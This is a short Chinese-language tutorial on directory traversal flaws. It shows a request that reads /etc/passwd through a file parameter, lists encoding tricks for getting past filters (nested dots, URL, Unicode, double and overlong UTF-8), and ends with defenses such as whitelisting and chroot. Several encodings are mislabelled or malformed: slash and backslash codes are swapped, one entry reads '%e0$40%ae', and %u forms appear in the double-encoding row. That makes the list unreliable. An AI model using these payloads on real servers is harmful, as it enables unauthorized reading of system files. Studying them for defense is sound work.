網站安全(13) ——目錄穿越漏洞(Directory Traversal)

標籤：c   code   http   a   strong   檔案   

如果應用程式使用使用者可控制的資料，以危險的方式訪問位於應用伺服器或其它後端檔案系統的檔案或目錄，就會出現路徑遍曆。

攻擊者可以將路徑遍曆序列放入檔案名稱內，向上回溯，從而訪問伺服器上的任何檔案，路徑遍曆序列叫“點-點-斜線”（..\）

http://***/go.action?file=..\..\etc\passwd

 

避開過濾
第一種是過濾檔案名稱參數中是否存在任何路徑遍曆序列(..\)
如果程式嘗試刪除(..\)來淨化使用者輸入，可以用
….// ….\/ …./\ ….\\
進行URL編碼
點–>%2e 反斜線–>%2f 正斜杠–>%5c
進行16為Unicode編碼
點–>%u002e 反斜線–>%u2215 正斜杠–>%u2216
進行雙倍URL編碼
點–>%252e 反斜線–>%u252f 正斜杠–>%u255c
進行超長UTF-8 Unicode編碼
點–>%c0%2e %e0$40%ae %c0ae
反斜線–>%c0af %e0%80af %c0%af
正斜杠–>%c0%5c %c0%80%5c

? 資料過濾，對網站使用者提交過來的檔案名稱進行寫入程式碼或者統一編碼，對檔案尾碼進行白名單控制，對包含了惡意的符號或者空位元組進行拒絕。   ? Web應用程式可以使用chrooted環境訪問包含被訪問檔案的目錄，或者使用絕對路徑+參數來控制訪問目錄，使其即使是越權或者跨越目錄也是在指定的目錄下。